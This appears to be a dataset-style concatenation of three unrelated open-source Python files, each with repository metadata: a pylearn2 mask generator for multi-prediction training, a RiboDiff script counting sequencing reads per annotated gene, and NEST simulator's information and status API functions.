class MaskGen:
"""
A class that generates masks for multi-prediction training.
Parameters
----------
drop_prob : float
The probability of dropping out a unit (making it a target of
the training criterion)
balance : bool
WRITEME
sync_channels : bool
If True:
Rather than dropping each pixel individually, drop spatial locations.
i.e., we either drop the red, the green, and the blue pixel at (x, y),
or we drop nothing at (x, y).
If False:
Drop each pixel independently.
drop_prob_y : float, optional
If specified, use a different drop probability for the class labels.
seed : int
The seed to use with MRG_RandomStreams for generating the random
masks.
"""
def __init__(self, drop_prob, balance=False, sync_channels=True,
drop_prob_y=None, seed=default_seed):
self.__dict__.update(locals())
del self.self
def __call__(self, X, Y=None, X_space=None):
"""
Provides the mask for multi-prediction training. A 1 in the mask
corresponds to a variable that should be used as an input to the
inference process. A 0 corresponds to a variable that should be
used as a prediction target of the multi-prediction training
criterion.
Parameters
----------
X : Variable
A batch of input features to mask for multi-prediction training
Y : Variable
A batch of input class labels to mask for multi-prediction
Training
Returns
-------
drop_mask : Variable
A Theano expression for a random binary mask in the same shape as
`X`
drop_mask_Y : Variable, only returned if `Y` is not None
A Theano expression for a random binary mask in the same shape as
`Y`
Notes
-----
Calling this repeatedly will yield the same random numbers each time.
"""
assert X_space is not None
self.called = True
assert X.dtype == config.floatX
theano_rng = make_theano_rng(getattr(self, 'seed', None), default_seed,
which_method="binomial")
if X.ndim == 2 and self.sync_channels:
raise NotImplementedError()
p = self.drop_prob
if not hasattr(self, 'drop_prob_y') or self.drop_prob_y is None:
yp = p
else:
yp = self.drop_prob_y
batch_size = X_space.batch_size(X)
if self.balance:
flip = theano_rng.binomial(
size=(batch_size,),
p = 0.5,
n = 1,
dtype = X.dtype)
yp = flip * (1 - p) + (1 - flip) * p
dimshuffle_args = ['x'] * X.ndim
if X.ndim == 2:
dimshuffle_args[0] = 0
assert not self.sync_channels
else:
dimshuffle_args[X_space.axes.index('b')] = 0
if self.sync_channels:
del dimshuffle_args[X_space.axes.index('c')]
flip = flip.dimshuffle(*dimshuffle_args)
p = flip * (1 - p) + (1 - flip) * p
# size needs to have a fixed length at compile time or the
# theano random number generator will be angry
size = tuple([X.shape[i] for i in xrange(X.ndim)])
if self.sync_channels:
del size[X_space.axes.index('c')]
drop_mask = theano_rng.binomial(
size=size,
p=p,
n=1,
dtype=X.dtype)
X_name = make_name(X, 'anon_X')
drop_mask.name = 'drop_mask(%s)' % X_name
if Y is not None:
assert isinstance(yp, float) or yp.ndim < 2
drop_mask_Y = theano_rng.binomial(
size=(batch_size, ),
p = yp,
n = 1,
dtype = X.dtype)
assert drop_mask_Y.ndim == 1
Y_name = make_name(Y, 'anon_Y')
drop_mask_Y.name = 'drop_mask_Y(%s)' % Y_name
return drop_mask, drop_mask_Y
return drop_mask
|
JazzeYoung/VeryDeepAutoEncoder
|
pylearn2/pylearn2/costs/dbm.py
|
Python
|
bsd-3-clause
| 68,703
|
[
"Gaussian"
] |
d2bf88fcd4c6adb3523ba5dfb67dbb01b52639afd68b33557e6d7db73bf8b5e5
|
#!/usr/bin/env python
"""
Counting the number of reads spanning over an annotated genomic feature
Requirement:
pysam:
"""
import os
import re
import sys
import pdb
import time
import array
import pysam
import cPickle
def parse_options(argv):
"""
Parses options from the command line
"""
from optparse import OptionParser, OptionGroup
parser = OptionParser()
required = OptionGroup(parser, 'REQUIRED')
required.add_option('-a', '--annotation', dest='anno', metavar='FILE', help='annotation file in GTF/GFF3 format', default='-')
required.add_option('-o', '--outfile', dest='outfile', metavar='FILE', help='outfile to store counts in tab delimited format [stdin]', default='-')
required.add_option('-A', '--alignment', dest='alignment', metavar='FILE', help='alignment in sam or bam format [stdin - sam]', default='-')
optional = OptionGroup(parser, 'OPTIONAL')
optional.add_option('-f', '--fields', dest='fields', metavar='STRING', help='annotation fields [exon], comma separated', default='exon')
optional.add_option('-b', '--bam_force', dest='bam_force', action='store_true', help='force BAM as input even if file ending is different from .bam - does not work for STDIN', default=False)
optional.add_option('-B', '--best_only', dest='best_only', action='store_true', help='count only the best alignment per read [off]', default=False)
optional.add_option('-v', '--verbose', dest='verbose', action='store_true', help='verbosity', default=False)
parser.add_option_group(required)
parser.add_option_group(optional)
(options, args) = parser.parse_args()
if len(argv) < 2:
parser.print_help()
sys.exit(2)
return options
def parse_anno_from_gff3(options, contigs):
"""
This function reads the gff3 input file and returns the information in an
internal data structure
"""
anno = dict()
idx2gene = dict()
gene2idx = dict()
if options.verbose:
print >> sys.stderr, "Parsing annotation from %s ..." % options.anno
### initial run to get the transcript to gene mapping
if options.verbose:
print >> sys.stderr, "... init structure"
trans2gene = dict()
for line in open(options.anno, 'r'):
if line[0] == '#':
continue
sl = line.strip().split('\t')
if sl[2] in ['mRNA', 'transcript']:
tags=sl[8].split(';')
tags[0] = tags[0].replace("transcript", "")
tags[0] = tags[0].replace("mRNA", "")
tags[1] = tags[1].replace("gene", "")
key_vals = dict()
for at in tags:
key, vals = at.split('=')
key_vals[key] = vals
#assert(tags[0][:2] == 'ID')
#assert(tags[1][:6] == 'Parent')
#trans2gene[tags[0][3:]] = tags[1][7:]
if key_vals.has_key('ID'):
child = key_vals['ID']
if key_vals.has_key('Parent'):
parent = key_vals['Parent']
trans2gene[child] = parent
### init genome structure
for c in contigs:
if options.verbose:
print 'reserving memory for chr %s of len %s' % (c, contigs[c])
anno[c] = array.array('H', '\x00\x00' * (contigs[c] + 1))
### init list of considered GFF fields
fields = options.fields.split(',')
### generate a list of exons with attached gene/transcript information
### one list per chromsome
counter = 1
gene_counter = 1
t0 = time.time()
for line in open(options.anno, 'r'):
if options.verbose and counter % 10000 == 0:
print >> sys.stderr, '.',
if counter % 100000 == 0:
t1 = time.time() - t0
print >> sys.stderr, "%i - took %.2f secs" % (counter, t1)
t0 = time.time()
counter += 1
if line[0] == '#':
continue
sl = line.strip().split('\t')
if not sl[2] in fields:
continue
tags = sl[8].split(';')
key_vals = dict()
if sl[2] == 'exon':
tags[0] = tags[0].replace("exon", "")
for at in tags:
key, vals = at.split('=')
key_vals[key] = vals
if key_vals.has_key('Parent'):
trans_id = key_vals['Parent']
try:
gene_id = trans2gene[trans_id]
except:
print >> sys.stdout, 'Currently only >mRNA, transcript< are supported'
else:
print >> sys.stderr, 'Currently only >exon< is supported'
sys.exit(1)
if not gene2idx.has_key(gene_id):
gene2idx[gene_id] = gene_counter
idx2gene[gene_counter] = gene_id
gene_counter += 1
### store for each position of the transcriptome one gene id
anno[sl[0]][int(sl[3]):int(sl[4]) + 1] = array.array('H', [gene2idx[gene_id]] * (int(sl[4]) + 1 - int(sl[3])))
if options.verbose:
print >> sys.stderr, "... done"
"""
if options.verbose:
print >> sys.stderr, "Dumping exon array ..."
### sparsify and dump annotation
dump_info = open(options.anno + '.dump.info', 'w')
for k in anno.keys():
if options.verbose:
print >> sys.stderr, "... %s" % k
out_fn = options.anno + '.' + k + '.dump'
anno[k].tofile(open(out_fn, 'w'))
print >> dump_info, "%s\t%s\t%i" % (k, out_fn, len(anno[k]))
dump_info.close()
if options.verbose:
print >> sys.stderr, "... pickling gene ID map"
cPickle.dump(idx2gene, open(options.anno + '.pickle', 'w'))
if options.verbose:
print >> sys.stderr, "... done"
"""
return (anno, idx2gene)
def parse_anno_from_gtf(options, contigs):
"""
This function reads the gtf input file and returns the information in an
internal data structure
"""
anno = dict()
idx2gene = dict()
gene2idx = dict()
if options.verbose:
print >> sys.stderr, "Parsing annotation from %s ..." % options.anno
### init genome structure
for c in contigs:
if options.verbose:
print 'reserving memory for chr %s of len %s' % (c, contigs[c])
anno[c] = array.array('H', '\x00\x00' * (contigs[c] + 1))
### init list of considered GFF fields
fields = options.fields.split(',')
### generate a list of exons with attached gene/transcript information
### one list per chromsome
counter = 1
gene_counter = 1
t0 = time.time()
for line in open(options.anno, 'r'):
if options.verbose and counter % 10000 == 0:
print >> sys.stderr, '.',
if counter % 100000 == 0:
t1 = time.time() - t0
print >> sys.stderr, "%i - took %.2f secs" % (counter, t1)
t0 = time.time()
counter += 1
if line[0] == '#':
continue
sl = line.strip().split('\t')
if not sl[2] in fields:
continue
tags = sl[8].split(';')
gene_id = tags[0][9:-1]
#transcript_id = '' # tags[1][16:-1]
if not gene2idx.has_key(gene_id):
gene2idx[gene_id] = gene_counter
idx2gene[gene_counter] = gene_id
gene_counter += 1
### store for each position of the transcriptome one gene id
anno[sl[0]][int(sl[3]):int(sl[4]) + 1] = array.array('H', [gene2idx[gene_id]] * (int(sl[4]) + 1 - int(sl[3])))
if options.verbose:
print >> sys.stderr, "... done"
"""
if options.verbose:
print >> sys.stderr, "Dumping exon array ..."
### sparsify and dump annotation
dump_info = open(options.anno + '.dump.info', 'w')
for k in anno.keys():
if options.verbose:
print >> sys.stderr, "... %s" % k
out_fn = options.anno + '.' + k + '.dump'
anno[k].tofile(open(out_fn, 'w'))
print >> dump_info, "%s\t%s\t%i" % (k, out_fn, len(anno[k]))
dump_info.close()
if options.verbose:
print >> sys.stderr, "... pickling gene ID map"
cPickle.dump(idx2gene, open(options.anno + '.pickle', 'w'))
if options.verbose:
print >> sys.stderr, "... done"
"""
return (anno, idx2gene)
def read_header(options, infile):
"""Parses the alignment header and extracts contig information"""
contigs = dict()
line = ''
if options.is_bam:
for i in range(len(infile.references)):
if contigs.has_key(infile.references[i]):
if not contigs[infile.references[i]] == infile.lengths[i]:
print >> sys.stderr, "Headers in BAM files have inconsistent contig lengths. Stopping ..."
sys.exit(1)
else:
contigs[infile.references[i]] = infile.lengths[i]
else:
for line in infile:
if not line[0] == '@':
if len(contigs) == 0:
print >> sys.stderr, "No header found in %s. Stopping." % file
sys.exit(1)
else:
break
sl = line.strip().split('\t')
if not sl[0] == '@SQ':
continue
if contigs.has_key(sl[1][3:]):
if not contigs[sl[1][3:]] == int(sl[2][3:]):
print >> sys.stderr, "Headers in BAM files have inconsistent contig lengths. Stopping ..."
sys.exit(1)
else:
contigs[sl[1][3:]] = int(sl[2][3:])
return (contigs, line)
def compress_counts(count_list, genes):
"""Takes a list of gene IDs and compresses them to a list of tuples"""
a = 0
g = 0
compressed_list = []
print >> sys.stderr, " [compressing gene list] ",
while g < len(genes):
while g < len(genes) and (a == len(count_list) or genes[g] < count_list[a]):
g += 1
if g < len(genes):
b = a
while a < len(count_list) and genes[g] == count_list[a]:
a += 1
compressed_list.append([genes[g], a - b])
g += 1
return compressed_list
def check_file_type(gff_fname):
"""
check the file type
"""
is_gff = False
for line in open(gff_fname, 'r'):
if line[0] == '#':
continue
line = line.strip('\n\r').split('\t')
try:
col9 = line[8]
except:
return is_gff
col9 = col9.rstrip(';| ')
atbs = col9.split(" ; ")
if len(atbs) == 1:
atbs = col9.split("; ")
if len(atbs) ==1:
atbs = col9.split(";")
gff3_pat = re.compile("\w+=")
#gtf_pat = re.compile("\s?\w+\s")
if gff3_pat.match(atbs[0]):
is_gff = True
break
return is_gff
def main():
"""Main Program Procedure"""
options = parse_options(sys.argv)
contigs = dict()
time_total = time.time()
### iterate over alignment file(s)
for file in options.alignment.split(','):
options.is_bam = False
### open file stream
if file == '-':
infile = sys.stdin
elif len(file) > 3 or options.bam_force:
try:
infile = pysam.Samfile(file, 'rb')
options.is_bam = True
except:
print 'NOT able to read the alignment file %s' % file
continue
else:
infile = open(file, 'r')
if options.verbose:
if options.alignment == '-':
print >> sys.stderr, "Reading alignment from stdin\n"
else:
print >> sys.stderr, "Reading alignment from %s\n" % options.alignment
### get contigs from alignment data
if len(contigs) == 0:
(contigs, lastline) = read_header(options, infile)
### TODO handle lastline (line after header) for SAM input
### check if we have a version on disk
if os.path.isfile(options.anno + '.pickle') and os.path.isfile(options.anno + '.dump.info'):
if options.verbose:
t0 = time.time()
print >> sys.stderr, 'Loading annotation from pickle/dump files ...'
idx2gene = cPickle.load(open(options.anno + '.pickle', 'r'))
anno = dict()
info_file = open(options.anno + '.dump.info', 'r')
for line in info_file:
sl = line.strip().split('\t')
anno[sl[0]] = array.array('H')
anno[sl[0]].fromfile(open(sl[1], 'r'), int(sl[2]))
if options.verbose:
t1 = time.time() - t0
print >>sys.stderr, "... %s took %i secs" % (sl[0], t1)
t0 = time.time()
info_file.close()
if options.verbose:
t1 = time.time() - t0
print >> sys.stderr, "... done - last took %i secs" % t1
else:
is_gff = check_file_type(options.anno)
if is_gff:
print 'gff-type file are here '
### read annotation from GFF3
(anno, idx2gene) = parse_anno_from_gff3(options, contigs)
else:
### read annotation from GTF
(anno, idx2gene) = parse_anno_from_gtf(options, contigs)
### count reads
counter = 1
t0 = time.time()
tmp_count = []
compressed_counts = []
genes = sorted(idx2gene.keys())
for line in infile:
if counter % 100000 == 0:
print >> sys.stderr, '.',
if counter % 1000000 == 0:
if len(tmp_count) > 5000000:
compressed_counts.extend(compress_counts(sorted(tmp_count), genes))
tmp_count = []
t1 = time.time() - t0
print >> sys.stderr, '%i (last 1000000 took %.2f secs)' % (counter, t1)
t0 = time.time()
counter += 1
if options.is_bam:
#chrm = infile.getrname(line.tid).replace('chr', '')
chrm = infile.getrname(line.tid)
pos = line.pos
broken = False
if line.is_unmapped:
continue
if options.best_only and line.is_secondary:
continue
for o in line.cigar:
if o[0] in [0, 2]:
for p in range(o[1]):
try:
g = anno[chrm][pos + p]
if g > 0:
tmp_count.append(g)
break
except KeyError:
continue
except IndexError:
if chrm in ['chrM', 'M', 'chrM_rCRS']:
continue
else:
print >> sys.stderr, 'ERROR: %i exceeds length of %s' % (pos + p, chrm)
if broken:
break
if not o[0] in [1, 5]:
pos += o[1]
else:
sl = line.strip().split('\t')
if len(sl) < 9:
print >> sys.stderr, "ERROR: invalid SAM line\n%s" % line
sys.exit(1)
(size, op) = (re.split('[^0-9]', sl[5])[:-1], re.split('[0-9]*', sl[5])[1:])
size = [int(i) for i in size]
#chrm = sl[2].replace('chr', '')
chrm = sl[2]
pos = int(sl[3]) - 1
broken = False
## is unmapped ?
if (int(sl[1]) & 4) == 4:
continue
## is secondary ?
if options.best_only and (int(sl[1]) & 256 == 256):
continue
for o in range(len(op)):
if op[o] in ['M', 'D']:
for p in range(size[o]):
try:
g = anno[chrm][pos + p]
if g > 0:
tmp_count.append(g)
break
except KeyError:
continue
except IndexError:
if chrm in ['chrM', 'M', 'chrM_rCRS']:
continue
else:
print >> sys.stderr, 'ERROR: %i exceeds length of %s' % (pos + p, chrm)
if broken:
break
if not op[o] in ['H', 'I']:
pos += size[o]
### close file stream
if not file == '-':
infile.close()
### compress remaining counts
compressed_counts.extend(compress_counts(sorted(tmp_count), genes))
tmp_count = []
### report counts to outfile
outfile = open(options.outfile, 'w')
print >> sys.stderr, "Sorting and condensing compressed list ..."
t0 = time.time()
compressed_counts = sorted(compressed_counts, key = lambda x: x[0])
for i in range(1, len(compressed_counts)):
if compressed_counts[i-1][0] == compressed_counts[i][0]:
compressed_counts[i][1] += compressed_counts[i-1][1]
compressed_counts[i-1][1] = -1
compressed_counts = filter(lambda x: x[1] >= 0, compressed_counts)
t1 = time.time() - t0
print >> sys.stderr, "... done. took %.2f secs" % t1
if options.verbose:
print >> sys.stderr, "Summarizing gene counts ..."
a = 0
g = 0
### seek to first position that mapped to gene (0 means not gene found)
while g < len(genes):
while g < len(genes) and (a == len(compressed_counts) or genes[g] < compressed_counts[a][0]):
print >> outfile, '%s\t0' % idx2gene[genes[g]]
if options.verbose and g % 100 == 0:
print >> sys.stderr, "%.2f / 100 percent \r" % (float(g) / len(genes) * 100),
g += 1
while a < len(compressed_counts) and g < len(genes) and genes[g] == compressed_counts[a][0]:
print >> outfile, '%s\t%i' % (idx2gene[genes[g]], compressed_counts[a][1])
a += 1
g += 1
if options.verbose and g % 100 == 0:
print >> sys.stderr, "%.2f / 100 percent \r" % (float(g) / len(genes) * 100),
if options.verbose:
t1 = time.time() - time_total
print >> sys.stderr, "\n... done - total run took %i secs." % t1
outfile.close()
if __name__ == "__main__":
main()
|
vipints/oqtans
|
oqtans_tools/RiboDiff/0.1/tools/count_reads.py
|
Python
|
bsd-3-clause
| 19,291
|
[
"pysam"
] |
936cdea36257e5e96d51ac35517fdd631fc0a235a18093d10268ef46dadfeef0
|
# -*- coding: utf-8 -*-
#
# hl_api_info.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
"""
Functions to get information on NEST.
"""
import sys
import os
import webbrowser
from ..ll_api import *
from .hl_api_helper import *
import nest
__all__ = [
'authors',
'get_argv',
'GetStatus',
'get_verbosity',
'help',
'helpdesk',
'message',
'SetStatus',
'set_verbosity',
'sysinfo',
'version',
]
@check_stack
def sysinfo():
"""Print information on the platform on which NEST was compiled.
"""
sr("sysinfo")
@check_stack
def version():
"""Return the NEST version.
Returns
-------
str
The version of NEST
"""
sr("statusdict [[ /kernelname /version ]] get")
return " ".join(spp())
@check_stack
def authors():
"""Print the authors of NEST.
"""
sr("authors")
@check_stack
def helpdesk():
"""Open the NEST helpdesk in browser.
Use the system default browser.
"""
if sys.version_info < (2, 7, 8):
print("The NEST helpdesk is only available with Python 2.7.8 or "
"later. \n")
return
if 'NEST_DOC_DIR' not in os.environ:
print(
'NEST help needs to know where NEST is installed.'
'Please source nest_vars.sh or define NEST_DOC_DIR manually.')
return
helpfile = os.path.join(os.environ['NEST_DOC_DIR'], 'help',
'helpindex.html')
# Under Windows systems webbrowser.open is incomplete
# See <https://bugs.python.org/issue8232>
if sys.platform[:3] == "win":
os.startfile(helpfile)
# Under MacOs we need to ask for the browser explicitly.
# See <https://bugs.python.org/issue30392>.
if sys.platform[:3] == "dar":
webbrowser.get('safari').open_new(helpfile)
else:
webbrowser.open_new(helpfile)
@check_stack
def help(obj=None, pager=None, return_text=False):
"""Show the help page for the given object using the given pager.
The default pager is `more` (See `.nestrc`).
Parameters
----------
obj : object, optional
Object to display help for
pager : str, optional
Pager to use
return_text : bool, optional
Option for returning the help text
Returns
-------
None or str
The help text of the object if `return_text` is `True`.
"""
hlpobj = obj
if hlpobj is not None:
if return_text:
return load_help(hlpobj)
else:
show_help_with_pager(hlpobj, pager)
else:
print("Type 'nest.helpdesk()' to access the online documentation "
"in a browser.")
print("Type 'nest.help(object)' to get help on a NEST object or "
"command.\n")
print("Type 'nest.Models()' to see a list of available models "
"in NEST.")
print("Type 'nest.authors()' for information about the makers "
"of NEST.")
print("Type 'nest.sysinfo()' to see details on the system "
"configuration.")
print("Type 'nest.version()' for information about the NEST "
"version.\n")
print("For more information visit https://www.nest-simulator.org.")
@check_stack
def get_argv():
"""Return argv as seen by NEST.
This is similar to Python :code:`sys.argv` but might have changed after
MPI initialization.
Returns
-------
tuple
Argv, as seen by NEST
"""
sr('statusdict')
statusdict = spp()
return statusdict['argv']
@check_stack
def message(level, sender, text):
"""Print a message using message system of NEST.
Parameters
----------
level :
Level
sender :
Message sender
text : str
Text to be sent in the message
"""
sps(level)
sps(sender)
sps(text)
sr('message')
@check_stack
def get_verbosity():
"""Return verbosity level of NEST's messages.
- M_ALL=0, display all messages
- M_INFO=10, display information messages and above
- M_DEPRECATED=18, display deprecation warnings and above
- M_WARNING=20, display warning messages and above
- M_ERROR=30, display error messages and above
- M_FATAL=40, display failure messages and above
Returns
-------
int:
The current verbosity level
"""
sr('verbosity')
return spp()
@check_stack
def set_verbosity(level):
"""Change verbosity level for NEST's messages.
- M_ALL=0, display all messages
- M_INFO=10, display information messages and above
- M_DEPRECATED=18, display deprecation warnings and above
- M_WARNING=20, display warning messages and above
- M_ERROR=30, display error messages and above
- M_FATAL=40, display failure messages and above
Parameters
----------
level : str
Can be one of 'M_FATAL', 'M_ERROR', 'M_WARNING', 'M_DEPRECATED',
'M_INFO' or 'M_ALL'.
"""
sr("{} setverbosity".format(level))
@check_stack
def SetStatus(nodes, params, val=None):
"""Set parameters of nodes or connections.
Parameters of nodes or connections, given in `nodes`, is set as specified
by `params`. If `val` is given, `params` has to be a `string` with the
name of an attribute, which is set to `val` on the nodes/connections. `val`
can be a single value or a list of the same size as nodes.
Parameters
----------
nodes : NodeCollection or SynapseCollection
Either a `NodeCollection` representing nodes, or a `SynapseCollection`
of connection handles as returned by
:py:func:`.GetConnections()`.
params : str or dict or list
Dictionary of parameters or list of dictionaries of parameters
of same length as `nodes`. If `val` is given, this has to be
the name of a model property as a str.
val : int, list, optional
If given, params has to be the name of a model property.
Raises
------
TypeError
If `nodes` is not a NodeCollection of nodes, a SynapseCollection of synapses, or if the
number of parameters don't match the number of nodes or
synapses.
See Also
-------
GetStatus
"""
if not isinstance(nodes, (nest.NodeCollection, nest.SynapseCollection)):
raise TypeError("'nodes' must be NodeCollection or a SynapseCollection.")
# This was added to ensure that the function is a nop (instead of,
# for instance, raising an exception) when applied to an empty
# list, which is an artifact of the API operating on lists, rather
# than relying on language idioms, such as comprehensions
if len(nodes) == 0:
return
n0 = nodes[0]
params_is_dict = isinstance(params, dict)
set_status_nodes = isinstance(nodes, nest.NodeCollection)
set_status_local_nodes = set_status_nodes and n0.get('local')
if (params_is_dict and set_status_local_nodes):
contains_list = [is_iterable(vals) and not is_iterable(n0.get(key))
for key, vals in params.items()]
if any(contains_list):
temp_param = [{} for _ in range(len(nodes))]
for key, vals in params.items():
if not is_iterable(vals):
for temp_dict in temp_param:
temp_dict[key] = vals
else:
for i, temp_dict in enumerate(temp_param):
temp_dict[key] = vals[i]
params = temp_param
if val is not None and is_literal(params):
if is_iterable(val) and not isinstance(val, (uni_str, dict)):
params = [{params: x} for x in val]
else:
params = {params: val}
if isinstance(params, (list, tuple)) and len(nodes) != len(params):
raise TypeError(
"status dict must be a dict, or a list of dicts of length "
"len(nodes)")
if isinstance(nodes, nest.SynapseCollection):
params = broadcast(params, len(nodes), (dict,), "params")
sps(nodes)
sps(params)
sr('2 arraystore')
sr('Transpose { arrayload pop SetStatus } forall')
else:
sli_func('SetStatus', nodes, params)
@check_stack
def GetStatus(nodes, keys=None, output=''):
"""Return the parameter dictionaries of nodes or connections.
If `keys` is given, a list of values is returned instead. `keys` may
also be a list, in which case the returned list contains lists of
values.
Parameters
----------
nodes : NodeCollection or SynapseCollection
Either a `NodeCollection` representing nodes, or a `SynapseCollection` of
connection handles as returned by :py:func:`.GetConnections()`.
keys : str or list, optional
string or a list of strings naming model properties.
`GetStatus` then returns a single value or a list of values
belonging to the keys given.
output : str, optional
Whether the returned data should be in a selected format
(``output='json'``).
Returns
-------
dict :
All parameters
type :
If `keys` is a string, the corrsponding default parameter is returned.
list :
If keys is a list of strings, a list of corrsponding default parameters is returned.
str :
If `output` is `json`, parameters is returned in JSON format.
Raises
------
TypeError
If `nodes` or `keys` are on the wrong form.
See Also
--------
SetStatus
"""
if not (isinstance(nodes, nest.NodeCollection) or isinstance(nodes, nest.SynapseCollection)):
raise TypeError("The first input (nodes) must be NodeCollection or a SynapseCollection with connection handles")
if len(nodes) == 0:
return nodes
if keys is None:
cmd = 'GetStatus'
elif is_literal(keys):
cmd = 'GetStatus {{ /{0} get }} Map'.format(keys)
elif is_iterable(keys):
keys_str = " ".join("/{0}".format(x) for x in keys)
cmd = 'GetStatus {{ [ [ {0} ] ] get }} Map'.format(keys_str)
else:
raise TypeError("keys should be either a string or an iterable")
sps(nodes)
sr(cmd)
result = spp()
if isinstance(result, dict):
# We have taken GetStatus on a layer object, or another NodeCollection with metadata, which returns a
# dictionary from C++, so we need to turn it into a tuple for consistency.
result = (result,)
if output == 'json':
result = to_json(result)
return result
|
janhahne/nest-simulator
|
pynest/nest/lib/hl_api_info.py
|
Python
|
gpl-2.0
| 11,191
|
[
"VisIt"
] |
6ff89ead12ab3ee7c2c4418ae4a0dcbf0a9e68b6e13f29ce02cd7f0fe79a56e3
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.